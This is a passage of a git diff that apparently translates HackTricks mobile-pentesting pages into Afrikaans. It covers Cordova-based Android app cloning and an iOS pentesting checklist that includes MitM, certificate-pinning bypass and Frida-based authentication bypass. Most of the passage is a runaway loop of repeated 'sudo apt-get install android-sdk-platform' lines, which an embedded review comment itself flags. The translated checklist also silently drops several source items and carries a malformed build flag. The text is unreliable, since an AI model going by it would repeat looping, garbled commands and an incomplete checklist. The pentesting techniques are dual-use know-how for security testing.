android-sdk-platform-29 -y +$ sudo apt-get install android-sdk-platform-30 -y +$ sudo apt-get install android-sdk-platform-31 -y +$ sudo apt-get install android-sdk-platform-23 -y +$ sudo apt-get install android-sdk-platform-25 -y +$ sudo apt-get install android-sdk-platform-26 -y +$ sudo apt-get install android-sdk-platform-27 -y +$ sudo apt-get install android-sdk-platform-28 -y +$ sudo apt-get install android-sdk-platform-29 -y +$ sudo apt-get install android-sdk-platform-30 -y +$ sudo apt-get install android-sdk-platform-31 -y +$ sudo apt-get install android-sdk-platform-23 -y +$ sudo apt-get install android-sdk-platform-25 -y +$ sudo apt-get install android-sdk-platform-26 -y +$ sudo apt-get install android-sdk-platform-27 -y +$ sudo apt-get install android-sdk-platform-28 -y +$ sudo apt-get install android-sdk-platform-29 -y +$ sudo apt-get install android-sdk-platform-30 -y +$ sudo apt-get install android-sdk-platform-31 -y +$ sudo apt-get install android-sdk-platform-23 -y +$ sudo apt-get install android-sdk-platform-25 -y +$ sudo apt-get install android-sdk-platform-26 -y +$ sudo apt-get install android-sdk-platform-27 -y +$ sudo apt-get install android-sdk-platform-28 -y +$ sudo apt-get install android-sdk-platform-29 -y +$ sudo apt-get install android-sdk-platform-30 -y +$ sudo apt-get install android-sdk-platform-31 -y +$ sudo apt-get install android-sdk-platform-23 -y +$ sudo apt-get install android-sdk-platform-25 -y +$ sudo apt-get install android-sdk-platform-26 -y +$ sudo apt-get install android-sdk-platform-27 -y +$ sudo apt-get install android-sdk-platform-28 -y +$ sudo apt-get install android-sdk-platform-29 -y +$ sudo apt-get install android-sdk-platform-30 -y +$ sudo apt-get install android-sdk-platform-31 -y +$ sudo apt-get install android-sdk-platform-23 -y +$ sudo apt-get install android-sdk-platform-25 -y +$ sudo apt-get install android-sdk-platform-26 -y +$ sudo apt-get install android-sdk-platform-27 -y +$ sudo apt-get install 
android-sdk-platform-28 -y +$ sudo apt-get install android-sdk-platform-29 -y +$ sudo apt-get install android-sdk-platform-30 -y +$ sudo apt-get install android-sdk-platform-31 -y +$ sudo apt-get install android-sdk-platform-23 -y +$ sudo apt-get install android-sdk-platform-25 -y +$ sudo apt-get install android-sdk-platform-26 -y +$ sudo apt-get install android-sdk-platform-27 -y +$ sudo apt-get install android-sdk-platform-28 -y +$ sudo apt-get install android-sdk-platform-29 -y +$ sudo apt-get install android-sdk-platform-30 -y +$ sudo apt-get install android-sdk-platform-31 -y +$ sudo apt-get install android-sdk-platform-23 -y +$ sudo apt-get install android-sdk-platform-25 -y +$ sudo apt-get install android-sdk-platform-26 -y +$ sudo apt-get install android-sdk-platform-27 -y +$ sudo apt-get install android-sdk-platform-28 -y +$ sudo apt-get install android-sdk-platform-29 -y +$ sudo apt-get install android-sdk-platform-30 -y +$ sudo apt-get install android-sdk-platform-31 -y +$ sudo apt-get install android-sdk-platform-23 -y +$ sudo apt-get install android-sdk-platform-25 -y +$ sudo apt-get install android-sdk-platform-26 -y +$ sudo apt-get install android-sdk-platform-27 -y +$ sudo apt-get install android-sdk-platform-28 -y +$ sudo apt-get install android-sdk-platform-29 -y +$ sudo apt-get install android-sdk-platform-30 -y +$ sudo apt-get install android-sdk-platform-31 -y +$ sudo apt-get install android-sdk-platform-23 -y +$ sudo apt-get install android-sdk-platform-25 -y +$ sudo apt-get install android-sdk-platform-26 -y +$ sudo apt-get install android-sdk-platform-27 -y +$ sudo apt-get install android-sdk-platform-28 -y +$ sudo apt-get install android-sdk-platform-29 -y +$ sudo apt-get install android-sdk-platform-30 -y +$ sudo apt-get install android-sdk-platform-31 -y +$ sudo apt-get install android-sdk-platform-23 -y +$ sudo apt-get install android-sdk-platform-25 -y +$ sudo apt-get install android-sdk-platform-26 -y +$ sudo apt-get install 
android-sdk-platform-27 -y +$ sudo apt-get install android-sdk-platform-28 -y +$ sudo apt-get install android-sdk-platform-29 -y +$ sudo apt-get install android-sdk-platform-30 -y +$ sudo apt-get install android-sdk-platform-31 -y +$ sudo apt-get install android-sdk-platform-23 -y +$ sudo apt-get install android-sdk-platform-25 -y +$ sudo apt-get install android-sdk-platform-26 -y +$ sudo apt-get install android-sdk-platform-27 -y +$ sudo apt-get install android-sdk-platform-28 -y +$ sudo apt-get install android-sdk-platform-29 -y +$ sudo apt-get install android-sdk-platform-30 -y +$ sudo apt-get install android-sdk-platform-31 -y +$ sudo apt-get install android-sdk-platform-23 -y +$ sudo apt-get install android-sdk-platform-25 -y +$ sudo apt-get install android-sdk-platform-26 -y +$ sudo apt-get install android-sdk-platform-27 -y +$ sudo apt-get install android-sdk-platform-28 -y +$ sudo apt-get install android-sdk-platform-29 -y +$ sudo apt-get install android-sdk-platform-30 -y +$ sudo apt-get install android-sdk-platform-31 -y +$ sudo apt-get install android-sdk-platform-23 -y +$ sudo apt-get install android-sdk-platform-25 -y +$ sudo apt-get install android-sdk-platform-26 -y +$ sudo apt-get install android-sdk-platform-27 -y +$ sudo apt-get install android-sdk-platform-28 -y +$ sudo apt-get install android-sdk-platform-29 -y +$ sudo apt-get install android-sdk-platform-30 -y +$ sudo apt-get install android-sdk-platform-31 -y +$ sudo apt-get install android-sdk-platform-23 -y +$ sudo apt-get install android-sdk-platform-25 -y +$ sudo apt-get install android-sdk-platform-26 -y +$ sudo apt-get install android-sdk-platform-27 -y +$ sudo apt-get install android-sdk-platform-28 -y +$ sudo apt-get install android-sdk-platform-29 -y +$ sudo apt-get install android-sdk-platform-30 -y +$ sudo apt-get install android-sdk-platform-31 -y +$ sudo apt-get install android-sdk-platform-23 -y +$ sudo apt-get install android-sdk-platform-25 -y +$ sudo apt-get install 
android-sdk-platform-26 -y +$ sudo apt-get install android-sdk-platform-27 -y +$ sudo apt-get install android-sdk-platform-28 -y +$ sudo apt-get install android-sdk-platform-29 -y +$ sudo apt-get install android-sdk-platform-30 -y +$ sudo apt-get install android-sdk-platform-31 -y +$ sudo apt-get install android-sdk-platform-23 -y +$ sudo apt-get install android-sdk-platform-25 -y +$ sudo apt-get install android-sdk-platform-26 -y +$ sudo apt-get install android-sdk-platform-27 -y +$ sudo apt-get install android-sdk-platform-28 -y +$ sudo apt-get install android-sdk-platform-29 -y +$ sudo apt-get install android-sdk-platform-30 -y +$ sudo apt-get install android-sdk-platform-31 -y +$ sudo apt-get install android-sdk-platform-23 -y +$ sudo apt-get install android-sdk-platform-25 -y +$ sudo apt-get install android-sdk-platform-26 -y +$ sudo apt-get install android-sdk-platform-27 -y +$ sudo apt-get install android-sdk-platform-28 -y +$ sudo apt-get install android-sdk-platform-29 -y +$ sudo apt-get install android-sdk-platform-30 -y +$ sudo apt-get install android-sdk-platform-31 -y +$ sudo apt-get install android-sdk-platform-23 -y +$ sudo apt-get install android-sdk-platform-25 -y +$ sudo apt-get install android-sdk-platform-26 -y +$ sudo apt-get install android-sdk-platform-27 -y +$ sudo apt-get install android-sdk-platform-28 -y +$ sudo apt-get install android-sdk-platform-29 -y +$ sudo apt-get install android-sdk-platform-30 -y +$ sudo apt-get install android-sdk-platform-31 -y +$ sudo apt-get install android-sdk-platform-23 -y +$ sudo apt-get install android-sdk-platform-25 -y +$ sudo apt-get install android-sdk-platform-26 -y +$ sudo apt-get install android-sdk-platform-27 -y +$ sudo apt-get install android-sdk-platform-28 -y +$ sudo apt-get install android-sdk-platform-29 -y +$ sudo apt-get install android-sdk-platform-30 -y +$ sudo apt-get install android-sdk-platform-31 -y +$ sudo apt-get install android-sdk-platform-23 -y +$ sudo apt-get install 
android-sdk-platform-25 -y +$ sudo apt-get install android-sdk-platform-26 -y +$ sudo apt-get install android-sdk-platform-27 -y +$ sudo apt-get install android-sdk-platform-28 -y +$ sudo apt-get install android-sdk-platform-29 -y +$ sudo apt-get install android-sdk-platform-30 -y +$ sudo apt-get install android-sdk-platform-31 -y +$ sudo apt-get install android-sdk-platform-23 -y +$ sudo apt-get install android-sdk-platform-25 -y +$ sudo apt-get install android-sdk-platform-26 -y +$ sudo apt-get install android-sdk-platform-27 -y +$ sudo apt-get install android-sdk-platform-28 -y +$ sudo apt-get install android-sdk-platform-29 -y +$ sudo apt-get install android-sdk-platform-30 -y +$ sudo apt-get install android-sdk-platform-31 -y +$ sudo apt-get install android-sdk-platform-23 -y +$ sudo apt-get install android-sdk-platform-25 -y +$ sudo apt-get install android-sdk-platform-26 -y +$ sudo apt-get install android-sdk-platform-27 -y +$ sudo apt-get install android-sdk-platform-28 -y +$ sudo apt-get install android-sdk-platform-29 -y +$ sudo apt-get install android-sdk-platform-30 -y +$ sudo apt-get install android-sdk-platform-31 -y +``` ```bash cd bank-new cordova requirements ``` - -To build the APK, use the following command: - +Om die APK te bou, gebruik die volgende bevel: ```bash cd bank-new cordova build android — packageType=apk ``` +Hierdie bevel genereer 'n APK met die debug-opsie geaktiveer, wat foutopsporing via Google Chrome vergemaklik. Dit is noodsaaklik om die APK te onderteken voordat dit geïnstalleer word, veral as die toepassing kodeverandering-opsporingsmeganismes bevat. -This command generates an APK with the debug option enabled, facilitating debugging via Google Chrome. It's crucial to sign the APK before installation, especially if the application includes code tampering detection mechanisms. 
+### Outomatiseringstool -### Automation Tool - -For those seeking to automate the cloning process, **[MobSecco](https://github.com/Anof-cyber/MobSecco)** is a recommended tool. It streamlines the cloning of Android applications, simplifying the steps outlined above. +Vir diegene wat die kloonproses wil outomatiseer, is **[MobSecco](https://github.com/Anof-cyber/MobSecco)** 'n aanbevole hulpmiddel. Dit vereenvoudig die kloon van Android-toepassings deur die stappe hierbo beskryf.
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
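Review bot: The added prerequisites block under "Maak seker dat al die voorvereistes voldoen word voordat jy begin kompileer:" is not a translation of the source: the removed English lines contain only the sentence "Ensure all prerequisites are met before compiling:" followed by the `cordova requirements` fence, while the `+` side inserts a fenced block of `$ sudo apt-get install ...` commands in which `android-sdk-platform-23` through `android-sdk-platform-31` repeat in a loop across hundreds of lines. This looks like runaway generation in the translation workflow; the whole block should be dropped so the translated section mirrors the source, and if an install list is genuinely wanted it belongs in a separate English-first change without the `$` prompts, which break copy-paste. While here, the unchanged context line `cordova build android — packageType=apk` carries an em-dash where the CLI expects `--packageType=apk`; worth fixing in the source file since the translated copy inherits it.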
diff --git a/mobile-pentesting/ios-pentesting-checklist.md b/mobile-pentesting/ios-pentesting-checklist.md index aac02cfeb..180fe532d 100644 --- a/mobile-pentesting/ios-pentesting-checklist.md +++ b/mobile-pentesting/ios-pentesting-checklist.md @@ -1,133 +1,123 @@ -# iOS Pentesting Checklist +# iOS Pentesting Kontrolelys
\ -Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: +Gebruik [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) om maklik en outomatiese werkstrome te bou met behulp van die wêreld se mees gevorderde gemeenskapsinstrumente.\ +Kry vandag toegang: {% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy in HackTricks wil adverteer** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-### Preparation +### Voorbereiding -* [ ] Read [**iOS Basics**](ios-pentesting/ios-basics.md) -* [ ] Prepare your environment reading [**iOS Testing Environment**](ios-pentesting/ios-testing-environment.md) -* [ ] Read all the sections of [**iOS Initial Analysis**](ios-pentesting/#initial-analysis) to learn common actions to pentest an iOS application +* [ ] Lees [**iOS Basics**](ios-pentesting/ios-basics.md) +* [ ] Berei jou omgewing voor deur [**iOS Testing Environment**](ios-pentesting/ios-testing-environment.md) te lees +* [ ] Lees al die afdelings van [**iOS Initial Analysis**](ios-pentesting/#initial-analysis) om algemene aksies te leer om 'n iOS-toepassing te pentest -### Data Storage +### Data Berging -* [ ] [**Plist files**](ios-pentesting/#plist) can be used to store sensitive information. -* [ ] [**Core Data**](ios-pentesting/#core-data) (SQLite database) can store sensitive information. -* [ ] [**YapDatabases**](ios-pentesting/#yapdatabase) (SQLite database) can store sensitive information. -* [ ] [**Firebase**](ios-pentesting/#firebase-real-time-databases) miss-configuration. -* [ ] [**Realm databases**](ios-pentesting/#realm-databases) can store sensitive information. -* [ ] [**Couchbase Lite databases**](ios-pentesting/#couchbase-lite-databases) can store sensitive information. -* [ ] [**Binary cookies**](ios-pentesting/#cookies) can store sensitive information -* [ ] [**Cache data**](ios-pentesting/#cache) can store sensitive information -* [ ] [**Automatic snapshots**](ios-pentesting/#snapshots) can save visual sensitive information -* [ ] [**Keychain**](ios-pentesting/#keychain) is usually used to store sensitive information that can be left when reselling the phone. -* [ ] In summary, just **check for sensitive information saved by the application in the filesystem** +* [ ] [**Plist-lêers**](ios-pentesting/#plist) kan gebruik word om sensitiewe inligting te stoor. 
+* [ ] [**Core Data**](ios-pentesting/#core-data) (SQLite-databasis) kan sensitiewe inligting stoor. +* [ ] [**YapDatabases**](ios-pentesting/#yapdatabase) (SQLite-databasis) kan sensitiewe inligting stoor. +* [ ] [**Firebase**](ios-pentesting/#firebase-real-time-databases) mis-konfigurasie. +* [ ] [**Realm-databasisse**](ios-pentesting/#realm-databases) kan sensitiewe inligting stoor. +* [ ] [**Couchbase Lite-databasisse**](ios-pentesting/#couchbase-lite-databases) kan sensitiewe inligting stoor. +* [ ] [**Binêre koekies**](ios-pentesting/#cookies) kan sensitiewe inligting stoor +* [ ] [**Cache-data**](ios-pentesting/#cache) kan sensitiewe inligting stoor +* [ ] [**Outomatiese afskakelings**](ios-pentesting/#snapshots) kan visuele sensitiewe inligting stoor +* [ ] [**Sleutelketting**](ios-pentesting/#keychain) word gewoonlik gebruik om sensitiewe inligting te stoor wat agtergelaat kan word wanneer die foon verkoop word. +* [ ] Kortom, **kyk vir sensitiewe inligting wat deur die toepassing in die lêersisteem gestoor word** -### Keyboards +### Sleutelborde -* [ ] Does the application [**allow to use custom keyboards**](ios-pentesting/#custom-keyboards-keyboard-cache)? -* [ ] Check if sensitive information is saved in the [**keyboards cache files**](ios-pentesting/#custom-keyboards-keyboard-cache) +* [ ] Laat die toepassing toe om [**aangepaste sleutelborde te gebruik**](ios-pentesting/#custom-keyboards-keyboard-cache)? 
+* [ ] Kyk of sensitiewe inligting gestoor word in die [**sleutelborde se kaslêers**](ios-pentesting/#custom-keyboards-keyboard-cache) -### **Logs** +### **Logboeke** -* [ ] Check if [**sensitive information is being logged**](ios-pentesting/#logs) +* [ ] Kyk of [**sensitiewe inligting gelog word**](ios-pentesting/#logs) -### Backups +### Rugsteun -* [ ] [**Backups**](ios-pentesting/#backups) can be used to **access the sensitive information** saved in the file system (check the initial point of this checklist) -* [ ] Also, [**backups**](ios-pentesting/#backups) can be used to **modify some configurations of the application**, then **restore** the backup on the phone, and the as the **modified configuration** is **loaded** some (security) **functionality** may be **bypassed** +* [ ] [**Rugsteun**](ios-pentesting/#backups) kan gebruik word om toegang te verkry tot die sensitiewe inligting wat in die lêersisteem gestoor word (kyk na die aanvanklike punt van hierdie kontrolelys) +* [ ] Verder kan [**rugsteun**](ios-pentesting/#backups) gebruik word om sommige konfigurasies van die toepassing te wysig, dan die rugsteun op die foon te herstel, en as die **gewysigde konfigurasie** gelaai word, kan sekere (sekuriteits)funksionaliteit omseil word -### **Applications Memory** +### **Toepassingsgeheue** -* [ ] Check for sensitive information inside the [**application's memory**](ios-pentesting/#testing-memory-for-sensitive-data) +* [ ] Kyk vir sensitiewe inligting binne die [**toepassingsgeheue**](ios-pentesting/#testing-memory-for-sensitive-data) -### **Broken Cryptography** +### **Gebreekte Kriptografie** -* [ ] Check if yo can find [**passwords used for cryptography**](ios-pentesting/#broken-cryptography) -* [ ] Check for the use of [**deprecated/weak algorithms**](ios-pentesting/#broken-cryptography) to send/store sensitive data -* [ ] [**Hook and monitor cryptography functions**](ios-pentesting/#broken-cryptography) +* [ ] Kyk of jy [**wagwoorde wat vir kriptografie 
gebruik word**](ios-pentesting/#broken-cryptography) kan vind +* [ ] Kyk vir die gebruik van [**verouderde/swak algoritmes**](ios-pentesting/#broken-cryptography) om sensitiewe data te stuur/stoor +* [ ] [**Haak en monitor kriptografie-funksies**](ios-pentesting/#broken-cryptography) -### **Local Authentication** +### **Lokale Verifikasie** -* [ ] If a [**local authentication**](ios-pentesting/#local-authentication) is used in the application, you should check how the authentication is working. - * [ ] If it's using the [**Local Authentication Framework**](ios-pentesting/#local-authentication-framework) it could be easily bypassed - * [ ] If it's using a [**function that can dynamically bypassed**](ios-pentesting/#local-authentication-using-keychain) you could create a custom frida script +* [ ] As 'n [**lokale verifikasie**](ios-pentesting/#local-authentication) in die toepassing gebruik word, moet jy ondersoek instel hoe die verifikasie werk. +* [ ] As dit die [**Local Authentication Framework**](ios-pentesting/#local-authentication-framework) gebruik, kan dit maklik omseil word +* [ ] As dit 'n [**funksie is wat dinamies omseil kan word**](ios-pentesting/#local-authentication-using-keychain), kan jy 'n aangepaste frida-skrip skep -### Sensitive Functionality Exposure Through IPC +### Sensitiewe Funksionaliteit Blootstelling deur IPC -* [**Custom URI Handlers / Deeplinks / Custom Schemes**](ios-pentesting/#custom-uri-handlers-deeplinks-custom-schemes) - * [ ] Check if the application is **registering any protocol/scheme** - * [ ] Check if the application is **registering to use** any protocol/scheme - * [ ] Check if the application **expects to receive any kind of sensitive information** from the custom scheme that can be **intercepted** by the another application registering the same scheme - * [ ] Check if the application **isn't checking and sanitizing** users input via the custom scheme and some **vulnerability can be exploited** - * [ ] Check if the 
application **exposes any sensitive action** that can be called from anywhere via the custom scheme -* [**Universal Links**](ios-pentesting/#universal-links) - * [ ] Check if the application is **registering any universal protocol/scheme** - * [ ] Check the `apple-app-site-association` file - * [ ] Check if the application **isn't checking and sanitizing** users input via the custom scheme and some **vulnerability can be exploited** - * [ ] Check if the application **exposes any sensitive action** that can be called from anywhere via the custom scheme +* [**Aangepaste URI Handlers / Deeplinks / Aangepaste Skemas**](ios-pentesting/#custom-uri-handlers-deeplinks-custom-schemes) +* [ ] Kyk of die toepassing **enige protokol/skema registreer** +* [ ] Kyk of die toepassing **registreer om** enige protokol/skema **te gebruik** +* [ ] Kyk of die toepassing **verwag om enige soort sensitiewe inligting** van die aangepaste skema te ontvang wat deur 'n ander toepassing wat dieselfde skema registreer, **onderskep** kan word +* [ ] Kyk of die toepassing **nie gebruikersinvoer via die aangepaste skema nagaan en sanitiseer** nie en of 'n sekere **kwesbaarheid uitgebuit kan word** +* [ ] Kyk of die toepassing **enige sensitiewe aksie blootstel** wat van enige plek via die aangepaste skema geroep kan word +* [**Universele Skakels**](ios-pentesting/#universal-links) +* [ ] Kyk of die toepassing **enige universele protokol/skema registreer** +* [ ] Kyk na die `apple-app-site-association`-lêer +* [ ] Kyk of die toepassing **nie gebruikersinvoer via die aangepaste skema nagaan en sanitiseer** nie en of 'n sekere **kwesbaarheid uitgebuit kan word** +* [ ] Kyk of die toepassing **enige sensitiewe aksie blootstel** wat van enige plek via die aangepaste skema geroep kan word * [**UIActivity Sharing**](ios-pentesting/ios-uiactivity-sharing.md) - * [ ] Check if the application can receive UIActivities and if it's possible to exploit any vulnerability with specially crafted activity +* [ ] 
Kyk of die toepassing UI-aktiwiteite kan ontvang en of dit moontlik is om enige kwesbaarheid met spesiaal vervaardigde aktiwiteit uit te buit * [**UIPasteboard**](ios-pentesting/ios-uipasteboard.md) - * [ ] Check if the application if **copying anything to the general pasteboard** - * [ ] Check if the application if **using the data from the general pasteboard for anything** - * [ ] Monitor the pasteboard to see if any **sensitive data is copied** -* [**App Extensions**](ios-pentesting/ios-app-extensions.md) - * [ ] Is the application **using any extension**? -* [**WebViews**](ios-pentesting/ios-webviews.md) - * [ ] Check which kind of webviews are being used - * [ ] Check the status of **`javaScriptEnabled`**, **`JavaScriptCanOpenWindowsAutomatically`**, **`hasOnlySecureContent`** - * [ ] Check if the webview can **access local files** with the protocol **file://** **(**`allowFileAccessFromFileURLs`, `allowUniversalAccessFromFileURLs`) - * [ ] Check if Javascript can access **Native** **methods** (`JSContext`, `postMessage`) +* [ ] Kyk of die toepassing enige iets na die algemene knipbord kopie +### Netwerk Kommunikasie -### Network Communication +* [ ] Voer 'n [**MitM-aanval op die kommunikasie**](ios-pentesting/#network-communication) uit en soek na web kwesbaarhede. +* [ ] Kontroleer of die [**hostname van die sertifikaat**](ios-pentesting/#hostname-check) nagegaan word. +* [ ] Kontroleer/Omseil [**Sertifikaat Pinning**](ios-pentesting/#certificate-pinning) -* [ ] Perform a [**MitM to the communication**](ios-pentesting/#network-communication) and search for web vulnerabilities. 
-* [ ] Check if the [**hostname of the certificate**](ios-pentesting/#hostname-check) is checked -* [ ] Check/Bypass [**Certificate Pinning**](ios-pentesting/#certificate-pinning) +### **Verskeidenhede** -### **Misc** - -* [ ] Check for [**automatic patching/updating**](ios-pentesting/#hot-patching-enforced-updateing) mechanisms -* [ ] Check for [**malicious third party libraries**](ios-pentesting/#third-parties) +* [ ] Kontroleer vir [**outomatiese patching/opdatering**](ios-pentesting/#hot-patching-enforced-updateing) meganismes. +* [ ] Kontroleer vir [**skadelike derde party biblioteke**](ios-pentesting/#third-parties)
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PRs in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
\ -Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: +Gebruik [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) om maklik en **outomatiseer werkstrome** te bou met behulp van die wêreld se **mees gevorderde** gemeenskapsinstrumente.\ +Kry Vandag Toegang: {% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} diff --git a/mobile-pentesting/ios-pentesting/README.md b/mobile-pentesting/ios-pentesting/README.md index 4254b40a6..687bbeb39 100644 --- a/mobile-pentesting/ios-pentesting/README.md +++ b/mobile-pentesting/ios-pentesting/README.md @@ -3,221 +3,214 @@
\ -Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: +Gebruik [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) om maklik en outomatiese werksvloei te bou met behulp van die wêreld se mees gevorderde gemeenskaplike gereedskap.\ +Kry vandag toegang: {% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy in HackTricks wil adverteer** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
